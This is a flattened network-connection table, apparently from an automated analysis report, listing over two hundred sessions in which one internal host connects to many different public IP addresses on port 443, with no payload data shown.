                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21298192.168.2.23412882.246.80.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21299192.168.2.2352514120.118.158.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21300192.168.2.234327866.75.132.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21301192.168.2.2355898210.136.4.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21302192.168.2.2338478117.98.59.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21303192.168.2.2354626114.223.154.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21304192.168.2.2335538150.100.248.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21305192.168.2.233296080.246.59.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21306192.168.2.23479682.29.226.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21307192.168.2.2349128122.13.114.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21308192.168.2.235151099.155.196.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21309192.168.2.235413696.185.175.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21310192.168.2.2343348148.240.25.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21311192.168.2.234838294.150.3.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21312192.168.2.2335076209.82.183.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21313192.168.2.2339938134.195.152.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21314192.168.2.2351210128.132.230.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21315192.168.2.234764217.151.119.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21316192.168.2.2347232157.238.117.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21317192.168.2.2346912173.24.5.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21318192.168.2.2341298222.226.206.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21319192.168.2.235377882.29.14.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21320192.168.2.2337314181.165.132.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21321192.168.2.2337656128.141.222.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21322192.168.2.2336284181.201.119.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21323192.168.2.2345162139.86.99.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21324192.168.2.234084435.180.116.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21325192.168.2.234055637.132.175.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21326192.168.2.235388299.37.152.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21327192.168.2.2340316150.240.120.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21328192.168.2.2347542107.202.57.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21329192.168.2.2349650186.183.52.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21330192.168.2.235414252.83.27.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21331192.168.2.235555246.69.23.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21332192.168.2.2358836177.47.240.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21333192.168.2.2355400119.187.98.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21334192.168.2.2339818186.35.207.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21335192.168.2.235893065.239.217.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21336192.168.2.2356596206.8.227.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21337192.168.2.234705819.108.231.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21338192.168.2.2356416124.65.8.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21339192.168.2.2332978108.76.80.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21340192.168.2.233533095.243.235.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21341192.168.2.2360040180.78.245.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21342192.168.2.2352236186.206.143.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21343192.168.2.2341100189.69.187.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21344192.168.2.2349468183.23.125.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21345192.168.2.2339844107.36.184.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21346192.168.2.2350496177.153.96.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21347192.168.2.2350912212.250.76.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21348192.168.2.2343426219.241.214.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21349192.168.2.235793259.142.213.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21350192.168.2.2349118153.220.80.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21351192.168.2.2354218122.93.58.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21352192.168.2.2352336154.151.3.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21353192.168.2.2355016182.122.112.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21354192.168.2.2339796146.168.177.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21355192.168.2.2342880222.199.205.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21356192.168.2.2337942175.209.147.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21357192.168.2.236077491.253.108.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21358192.168.2.234434473.56.162.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21359192.168.2.233295078.254.35.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21360192.168.2.235595295.104.189.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21361192.168.2.234547647.80.153.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21362192.168.2.2356288188.131.169.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21363192.168.2.234457438.214.132.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21364192.168.2.2342544172.65.69.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21365192.168.2.2344458145.63.151.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21366192.168.2.235207220.173.174.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21367192.168.2.234315637.127.250.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21368192.168.2.2348924210.52.227.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21369192.168.2.235529059.246.18.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21370192.168.2.235039295.45.242.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21371192.168.2.233537665.194.157.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21372192.168.2.2360440198.219.210.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21373192.168.2.2344382111.181.252.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21374192.168.2.235590662.25.227.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21375192.168.2.233425888.161.184.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21376192.168.2.233755266.133.35.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21377192.168.2.2339454166.170.10.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21378192.168.2.234442036.117.168.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21379192.168.2.2360240142.195.86.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21380192.168.2.234629865.14.144.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21381192.168.2.2337618106.57.137.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21382192.168.2.2342758178.62.166.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21383192.168.2.2344064216.234.251.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21384192.168.2.234074823.147.84.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21385192.168.2.234345095.243.14.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21386192.168.2.2353612154.202.100.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21387192.168.2.235113854.22.58.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21388192.168.2.2343640176.80.117.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21389192.168.2.2357092219.99.107.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21390192.168.2.2336912150.62.96.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21391192.168.2.235205614.140.170.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21392192.168.2.2355962155.20.156.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21393192.168.2.2334020141.14.93.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21394192.168.2.2333402186.43.9.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21395192.168.2.2346358202.223.24.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21396192.168.2.2360976189.30.162.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21397192.168.2.236042023.54.212.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21398192.168.2.234492872.196.54.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21399192.168.2.2346244193.52.29.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21400192.168.2.235916640.193.30.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21401192.168.2.2349656198.249.124.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21402192.168.2.235082664.130.116.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21403192.168.2.234111284.62.194.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21404192.168.2.2353786157.62.38.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21405192.168.2.23367145.59.192.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21406192.168.2.2342596110.123.39.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21407192.168.2.2360082145.14.120.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21408192.168.2.234886636.138.178.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21409192.168.2.233607227.52.150.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21410192.168.2.233579438.249.79.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21411192.168.2.233460487.72.28.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21412192.168.2.2336684124.12.224.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21413192.168.2.23605701.137.245.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21414192.168.2.2354826136.251.23.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21415192.168.2.2346026185.147.175.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21416192.168.2.2349208136.153.137.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21417192.168.2.235031248.161.183.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21418192.168.2.2335270101.218.81.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21419192.168.2.234742069.87.192.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21420192.168.2.2351768189.136.206.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21421192.168.2.2357214188.161.32.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21422192.168.2.2333328119.66.153.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21423192.168.2.2353864222.180.208.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21424192.168.2.233594637.183.156.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21425192.168.2.2356998196.170.83.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21426192.168.2.2350970186.18.238.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21427192.168.2.2359564210.168.192.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21428192.168.2.233461297.130.152.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21429192.168.2.2336804104.245.190.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21430192.168.2.234110686.231.235.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21431192.168.2.2345106219.42.193.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21432192.168.2.2335460181.85.153.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21433192.168.2.2339816209.219.192.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21434192.168.2.2346912177.83.217.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21435192.168.2.235385278.25.149.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21436192.168.2.234467865.204.231.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21437192.168.2.234319031.231.144.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21438192.168.2.2338616203.2.69.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21439192.168.2.2359366151.48.15.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21440192.168.2.2360578122.57.253.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21441192.168.2.2352262163.114.83.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21442192.168.2.2357924159.160.235.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21443192.168.2.2353500213.154.129.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21444192.168.2.2332872140.17.210.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21445192.168.2.2349630146.14.11.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21446192.168.2.235768878.30.77.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21447192.168.2.234041823.254.157.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21448192.168.2.2342072161.98.178.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21449192.168.2.2347810140.124.67.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21450192.168.2.2346222168.232.228.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21451192.168.2.2344060157.102.86.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21452192.168.2.2336762125.239.83.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21453192.168.2.235300271.60.248.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21454192.168.2.2336132119.97.98.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21455192.168.2.235666214.107.141.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21456192.168.2.2360762208.235.88.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21457192.168.2.235301843.118.68.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21458192.168.2.235975635.235.226.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21459192.168.2.235662631.70.73.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21460192.168.2.2335648187.240.194.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21461192.168.2.2359814141.77.161.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21462192.168.2.2346816113.241.150.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21463192.168.2.2342776109.155.139.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21464192.168.2.235521819.218.88.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21465192.168.2.234252274.248.91.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21466192.168.2.234209283.218.251.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21467192.168.2.2354276173.182.170.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21468192.168.2.2360002165.24.179.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21469192.168.2.235696290.138.188.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21470192.168.2.233661691.162.202.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21471192.168.2.233396214.219.155.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21472192.168.2.2340788176.240.143.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21473192.168.2.2354304192.107.232.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21474192.168.2.235883694.79.36.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21475192.168.2.2337828222.245.223.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21476192.168.2.235048698.46.133.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21477192.168.2.233293288.248.115.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21478192.168.2.2353904147.59.36.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21479192.168.2.2351756128.162.154.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21480192.168.2.2341756171.252.4.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21481192.168.2.233676654.23.98.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21482192.168.2.233312485.24.156.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21483192.168.2.233290471.46.108.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21484192.168.2.235271882.129.176.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21485192.168.2.2340704166.4.183.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21486192.168.2.2336488104.177.17.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21487192.168.2.234246681.127.155.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21488192.168.2.2343354208.105.109.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21489192.168.2.2334396103.116.167.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21490192.168.2.2353794221.25.145.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21491192.168.2.2353952209.240.140.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21492192.168.2.2359528209.120.114.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21493192.168.2.2350890136.71.199.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21494192.168.2.233916412.59.61.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21495192.168.2.2349600141.142.75.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21496192.168.2.235736238.247.101.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21497192.168.2.2354014142.56.39.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21498192.168.2.2339524184.253.15.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21499192.168.2.2339600126.24.129.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21500192.168.2.235384061.13.203.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21501192.168.2.2337136217.235.171.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21502192.168.2.23381289.135.145.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21503192.168.2.2348224192.118.126.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21504192.168.2.233573895.120.110.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21505192.168.2.235044892.119.206.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21506192.168.2.234720048.8.5.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21507192.168.2.2346986172.226.173.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21508192.168.2.234966453.176.150.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21509192.168.2.2347930157.180.48.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21510192.168.2.2352518149.204.54.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21511192.168.2.233575025.118.111.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21512192.168.2.2351132145.96.127.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21513192.168.2.2341166186.38.116.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21514192.168.2.2337436159.126.55.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21515192.168.2.235259050.97.241.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21516192.168.2.2359554218.224.90.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21517192.168.2.234771225.234.62.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21518192.168.2.2336738115.247.215.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21519192.168.2.2340700122.120.99.150443
